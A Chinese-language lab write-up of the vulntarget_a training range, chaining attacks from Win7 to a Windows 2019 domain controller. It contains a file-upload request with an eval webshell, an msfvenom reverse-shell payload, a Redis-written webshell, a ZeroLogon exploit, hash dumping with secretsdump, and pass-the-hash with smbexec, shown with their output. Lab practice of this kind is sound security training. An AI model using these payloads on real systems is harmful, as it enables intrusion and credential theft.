vulntarget_a 训练笔记-EW帮帮网

win 7 权限

利用任意文件上传 getshell

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"

submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"

R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--

当然工具直接梭哈也行

win 2016 权限

将 win7 上线 cs 备用

cs木马生成

设置监听器

生成 exe 的木马

用蚁剑传输后运行即可上线

redis 未授权 getshell

MSF上线

生成反向马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe

通过蚁剑上传执行，msf 监听

┌──(root㉿kali)-[~]
└─# msfconsole 

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800

meterpreter > ls
Listing: C:\tmp
===============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2024-10-23 20:06:58 +0800  555.exe

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >

添加路由，设置代理，arp获取到内网同网段IP

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set session 1
session => 1

msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed

msf6 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION  1                yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

View the full module info with the info, or info -d command.

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
                                        0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > arp a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    10.0.20.1        00:50:56:c0:00:0b  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.99       00:0c:29:49:db:32  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.254      00:50:56:f2:92:e5  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.255      ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    192.168.159.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection
    192.168.159.2    00:50:56:f4:36:2d  Intel(R) PRO/1000 MT Network Connection
    192.168.159.128  00:0c:29:cc:f9:72  Intel(R) PRO/1000 MT Network Connection
    192.168.159.254  00:50:56:fe:c6:0b  Intel(R) PRO/1000 MT Network Connection
    192.168.159.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2
    224.0.0.22       01:00:5e:00:00:16  Bluetooth ����(����������)
    224.0.0.252      00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2
    239.255.255.250  00:00:00:00:00:00  Software Loopback Interface 1
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Bluetooth ����(����������)

更改配置

vi  /etc/proxychains4.conf

代理之后，可以直接 redis 未授权访问

利用redis未授权以及php web环境来getshell

redis未授权漏洞写webshell

┌──(root㉿kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>

写好shell之后，蚁剑设置代理连接

cs上线

右键 win7 选择转发上线

如图选择 payload 生成

设置完后会自动创建监听器，并自动开启监听

win2019 权限获取

msf 正向代理

通过代理启动 msf,注意只有通过代理（proxychains msfconsole）才能使流量正向到内网win2016上

┌──(root㉿kali)-[/zbug]
└─# proxychains msfconsole

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result 
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17le.../                                               
[proxychains] DLL init: proxychains-ng 4.17

msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17

msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17

msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17

msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444  ...  OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17

meterpreter >

通过蚁剑运行即可

添加路由链

meterpreter >  run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17

[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17

meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17

meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17

msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17

msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17

msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addres
                                       ses.
   SRVPORT  1081             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

[proxychains] DLL init: proxychains-ng 4.17

msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >

这里配置完之后继续配置代理文件

vi  /etc/proxychains4.conf

使用 nmap 测试是否连接成功

┌──(root㉿kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:139  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).

PORT     STATE  SERVICE
80/tcp   closed http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 45.37 seconds

CVE-2020-1472利用

git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .

下载完成后,利用用 cve-2020-1472 漏洞将域控密码置空

┌──(root㉿kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110 

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49670  ...  OK
=========================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

使用 secretsdump.py 尝试获取 administrator 域控的 hash 值,此文件在 impacket/examples 目录下

┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py  vulntarget.com/WIN2019\$@10.0.10.110  -just-dc  -no-pass

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up...

成功获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

相同目录下使用 smbexec.py 拿域控shell

┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

vulntarget_a 训练笔记

win 7 权限

利用任意文件上传 getshell

当然工具直接梭哈也行

win 2016 权限

将 win7 上线 cs 备用

cs木马生成

redis 未授权 getshell

MSF上线

cs上线

win2019 权限获取

msf 正向代理

CVE-2020-1472利用

网站公告

今日签到

热门文章

最新发布

vulntarget_a 训练笔记

win 7 权限

利用任意文件上传 getshell

当然工具直接梭哈也行

​win 2016 权限

将 win7 上线 cs 备用

cs木马生成

redis 未授权 getshell

MSF上线

cs上线

win2019 权限获取

msf 正向代理

CVE-2020-1472利用

网站公告

今日签到

热门文章

最新发布

win 2016 权限